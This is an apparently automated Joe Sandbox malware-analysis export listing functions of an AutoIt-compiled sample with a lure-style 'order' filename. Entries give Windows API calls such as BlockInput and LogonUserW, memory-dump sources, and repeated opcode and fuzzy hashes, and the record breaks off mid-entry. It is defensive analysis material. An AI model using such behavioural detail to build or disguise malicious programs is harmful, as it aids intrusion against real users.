Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction ID: 69bf81b66c3c26f1d0dd6c17de0175bc626120c7630bd7c8ead8038a3ade81aa
Opcode Fuzzy Hash: 06bbaeb1bcc534ec256dd5b5d585b6de8006006e2b3e3cdbfaef78062e17ea4a
Instruction Fuzzy Hash: 2AB1E220D2AF414DD72396398831336B75CAFBB2D5FA1D72BFC1A74D62EB2185934284

Function 0044B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0044B6DF

Part of subcall function 0042344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0044BDC3,00000000,?,?,?,?,0044BF70,00000000,?), ref: 00423453
Part of subcall function 0042344A: __aulldiv.LIBCMT ref: 00423473

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction ID: 1f35ff8c92ab85e28a2e756204d048eea2d4dd3abb22b0d8cab743f592bf07ce
Opcode Fuzzy Hash: f8c7fdc095501e1a7362a0b4cc7a48e3a2c9a4e74b9e0d285671c9b74daca32a
Instruction Fuzzy Hash: 9821A2766345108BD729CF38C881A92B7E1EB95311B248E7DE4E5CB2D0CB78B905DB98

Function 00456AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00456ACA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction ID: 4b42a4be7651b4fa624864156804a6211604a361ef3ec37b6f4db9037ef0e3f8
Opcode Fuzzy Hash: fd96fe04c980a47b0c7ec9d3b110ca338f5497ba0de8e1a16d66643787cb35ec
Instruction Fuzzy Hash: 5BE092352002046FD700EB99D40499AB7ECAFA4351B04842BF905D7291DAB4E8088B94

Function 004474E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0044750A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0a989b60394fe3a89bb53e495b3d7760a900f4bf5ae5a001b401ca4ddc74365b
Instruction ID: b1c6601c3e7c198507b9802ed8dd93b8fb3c162f29ab6dc9e599c823946f98a7
Opcode Fuzzy Hash: 0a989b60394fe3a89bb53e495b3d7760a900f4bf5ae5a001b401ca4ddc74365b
Instruction Fuzzy Hash: C6D09EA416C64579FC190B249D1BFB71608F300795FD4495B7603DD9C1AAEC6D07A03D

Function 0043B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0043AD3E), ref: 0043B124

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction ID: 9ead16adecf6f0b98c9b1c0a3e5b035ff8be85389ca5a659f0ab2e7831142da2
Opcode Fuzzy Hash: 0316c8143167c0ab3b8a5928f716c4ef1b9c9b37dc612f5938544d9d01bac684
Instruction Fuzzy Hash: A8D05E320A460EAEDF024FA4EC02EAE3F6AEB04700F408510FA11D50A0C671D531AB50

Function 00428189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042818F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction ID: d9a2277a5669354ba61d9b8df2fcfec71eca91813c8554d43367222680a44f9d
Opcode Fuzzy Hash: 33dab03a718f0b688abc4cd95ed1984bc35f62c12f51b8bc9575a0ce6196a3c6
Instruction Fuzzy Hash: E4A0113000020CAB8F002B82EC088883F2CEA002A0B000030F80C000208B22A820AA8A

Function 004093F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18aa276161eb3999a4f957b66dfd8cc5ab17b19e633c5ff1735e8ccb839f16a
Instruction ID: c286300d99e2b91445e27a8d3dc9f2c346740fa195f4ecc71a48a56eb8d2d117
Opcode Fuzzy Hash: b18aa276161eb3999a4f957b66dfd8cc5ab17b19e633c5ff1735e8ccb839f16a
Instruction Fuzzy Hash: CD127170A002099BDF04DFA5DA81AEEB7F5FF48304F10852AE406F7291DB3AAD11CB59

Function 0040E3E3 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64b24a2c553c22aa869de9af687b95242a6e90b579e12135d10eb0df70d050d8
Instruction ID: 8c316f122af884e65fd23efdceb602b2cf0fe7a3b43f3523b9e3e47a843a4e61
Opcode Fuzzy Hash: 64b24a2c553c22aa869de9af687b95242a6e90b579e12135d10eb0df70d050d8
Instruction Fuzzy Hash: F912D170A04205DFDB24DF56C480AAAB7B0FF14304F54C87BD949AB391E339AD96CB99

Function 0040AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: d9789282d456dc797497e94230e5521687c6143ee10994470d5f1e8132ce8b71
Instruction ID: 51b8f2ae0ea6a7a2cdf14863a84620939d9b69a1a68befcef78454a7017468de
Opcode Fuzzy Hash: d9789282d456dc797497e94230e5521687c6143ee10994470d5f1e8132ce8b71
Instruction Fuzzy Hash: 5202D370A00205DBCF04DF65DA81AAEB7B5FF44304F10C07AE80AEB295EB79D955CB99

Function 004202A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 60745259864980ffaeeb8d0df3bf3fea5f6cb1ca8e1c1cebd13c90a26c2c7bac
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 32C1F6323051A30ADF2D8639943447FFAE15A917B171A036FD8B2CB6D2FF28C569D624

Function 004206D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 44f5d9664e715192188212fdf678a4eee384f5bf2223b1db12e0b08a2e30af3f
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 67C1E4323052A309DF2D4639943443FBAE15AA27B170A036FD4B3CB6D6FF28C569D624

Function 0041FE6F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 0d4d126f8896e5ccdc1a301f10f88da503634eda363e49b0f4f11f03865d3af4
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 07C1F5322052A309DF2D4639943447FFAE15AA27B171A036FD4B3CB6D2FF28C569D624

Function 0041FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5ea60f499aeb44b68148b7f17fc018670148d17cb1e2a6587ad167bf6fc26cab
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 56C1D23220919309DF2D4639C4304BFBAA15AA17B171A077ED4B3CB6D5FF28C5AAD624

Function 00DFCB58 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 2c0ce2e1ac37fca32e97c75e2886d70e2b056d6ed317c5ce30752977fdcb1052
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 2941D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 00DFCA48 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 4263da0591fcc57eeef94b7bb93cc8f4385ad6fe1936d804c26d9c5cd9c7dc53
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: C2019278A1010DEFCB44DF98C6909AEF7B5FF48310F208699E919A7345E730AE51DB90

Function 00DFC9E8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 0aa043939e83e39a1f5b7ac0e98382dc17f9f96c75a176238c4f0dc2334be9a8
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: D1019278A1010DEFCB44DF98C6909AEF7B5FB48310F208699E909A7305E730AE51DB90

Function 00DFB3C8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 0045A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0045A2FE
DeleteObject.GDI32(00000000), ref: 0045A310
DestroyWindow.USER32 ref: 0045A31E
GetDesktopWindow.USER32 ref: 0045A338
GetWindowRect.USER32(00000000), ref: 0045A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0045A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A4D8
GetClientRect.USER32(00000000,?), ref: 0045A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0045A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A55E
GlobalLock.KERNEL32(00000000), ref: 0045A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A576
GlobalUnlock.KERNEL32(00000000), ref: 0045A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A586
GlobalFree.KERNEL32(00000000), ref: 0045A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0048D9BC,00000000), ref: 0045A5B9
GlobalFree.KERNEL32(00000000), ref: 0045A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0045A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0045A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0045A81D

Strings

AutoIt v3, xrefs: 0045A4D0
DISPLAY, xrefs: 0045A680
static, xrefs: 0045A518, 0045A66F
, xrefs: 0045A7A3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ebd24ffd39a70404a385d019b7b726d78d585ee00c91a9f2ec2d7577a68bd056
Instruction ID: 53d84e717a84cd646c9bb37dc5a0418975d314d2cf4d1fc3b1c59ead6aebad59
Opcode Fuzzy Hash: ebd24ffd39a70404a385d019b7b726d78d585ee00c91a9f2ec2d7577a68bd056
Instruction Fuzzy Hash: 29029C71900108AFDB14DFA5CD88EAE7BB9FF49315F008669F905AB2A2C734DD45CB68

Function 0046D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0046D2DB
GetSysColorBrush.USER32(0000000F), ref: 0046D30C
GetSysColor.USER32(0000000F), ref: 0046D318
SetBkColor.GDI32(?,000000FF), ref: 0046D332
SelectObject.GDI32(?,00000000), ref: 0046D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D36C
GetSysColor.USER32(00000010), ref: 0046D374
CreateSolidBrush.GDI32(00000000), ref: 0046D37B
FrameRect.USER32(?,?,00000000), ref: 0046D38A
DeleteObject.GDI32(00000000), ref: 0046D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0046D3DC
FillRect.USER32(?,?,00000000), ref: 0046D40E
GetWindowLongW.USER32(?,000000F0), ref: 0046D439

Part of subcall function 0046D575: GetSysColor.USER32(00000012), ref: 0046D5AE
Part of subcall function 0046D575: SetTextColor.GDI32(?,?), ref: 0046D5B2
Part of subcall function 0046D575: GetSysColorBrush.USER32(0000000F), ref: 0046D5C8
Part of subcall function 0046D575: GetSysColor.USER32(0000000F), ref: 0046D5D3
Part of subcall function 0046D575: GetSysColor.USER32(00000011), ref: 0046D5F0
Part of subcall function 0046D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D5FE
Part of subcall function 0046D575: SelectObject.GDI32(?,00000000), ref: 0046D60F
Part of subcall function 0046D575: SetBkColor.GDI32(?,00000000), ref: 0046D618
Part of subcall function 0046D575: SelectObject.GDI32(?,?), ref: 0046D625
Part of subcall function 0046D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0046D644
Part of subcall function 0046D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D65B
Part of subcall function 0046D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0046D670
Part of subcall function 0046D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D698

Memory Dump Source

